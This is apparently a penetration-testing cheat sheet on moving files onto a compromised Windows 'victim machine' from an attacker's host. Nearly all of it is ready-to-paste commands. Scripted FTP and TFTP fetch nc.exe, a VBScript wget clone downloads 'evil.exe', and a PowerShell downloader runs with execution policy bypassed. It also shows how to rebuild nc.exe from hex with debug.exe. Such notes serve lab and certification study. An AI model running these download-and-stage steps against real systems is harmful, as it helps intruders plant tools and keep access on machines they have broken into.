Windows basics

Transferring files

Why is this so much harder in Windows? I don't know.

FTP

Even though many Windows versions have FTP clients, we can't use them interactively because it will kill shells. But we can run multiple commands from a file and download them from an FTP server like pure-ftpdon the attack machine.
On the victim machine, echo the following commands into a file:
1
echo open [attack machine]> ftp.txt
2
echo bob>> ftp.txt
3
echo bob>> ftp.txt
4
echo binary>> ftp.txt
5
echo GET nc.exe>> ftp.txt
6
echo bye>> ftp.txt
Copied!
Then run this command to connect:
1
ftp -s:ftp.txt
Copied!

TFTP

TFTP is installed by default on Windows XP and Windows 2003. Kali also has a TFTP server:
1
atftpd --daemon --port 69 /tftp
2
/etc/init.d/atftpd restart
Copied!
With this command you can serve files from /srv/tftp.
From a Windows machine, use this to transfer files:
1
tftp -i [host] get nc.exe
Copied!

VBScript

Here is a good script to make a wget-clone in VB (may need to be piped through unix2dos before copying it):
1
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
2
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
3
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
4
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
5
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
6
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
7
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
8
echo Err.Clear >> wget.vbs
9
echo Set http = Nothing >> wget.vbs
10
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
11
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
12
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
13
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
14
echo http.Open "GET",strURL,False >> wget.vbs
15
echo http.Send >> wget.vbs
16
echo varByteArray = http.ResponseBody >> wget.vbs
17
echo Set http = Nothing >> wget.vbs
18
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
19
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
20
echo strData = "" >> wget.vbs
21
echo strBuffer = "" >> wget.vbs
22
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
23
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
24
echo Next >> wget.vbs
25
echo ts.Close >> wget.vbs
Copied!
To execute:
1
cscript wget.vbs http://[hoste]/evil.exe evil.exe
Copied!

Powershell

Powershell can't be started in a non-interactive shell. But this script can start it:
1
echo $storageDir = $pwd > wget.ps1
2
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
3
echo $url = "http://[host]/file.exe" >>wget.ps1
4
echo $file = "output-file.exe" >>wget.ps1
5
echo $webclient.DownloadFile($url,$file) >>wget.ps1
Copied!
To execute:
1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Copied!

Debug.exe

On windows 32 bit machines, it is possible to use debug.exe to transfer programs. It is used to inspect binaries, like a debugger, but can also rebuild them from hex. For example, a binary like nc.exe can be disassembled into hex, pasted into a file on the victim machine, and then assembled with debug.exe.
Debug.exe can only assemble 64 kb, use upx to compress the executable:
1
upx -9 nc.exe
Copied!
To disassemble:
1
wine exe2bat.exe nc.exe nc.txt
Copied!
Pasting that into the Windows shell will create nc.exe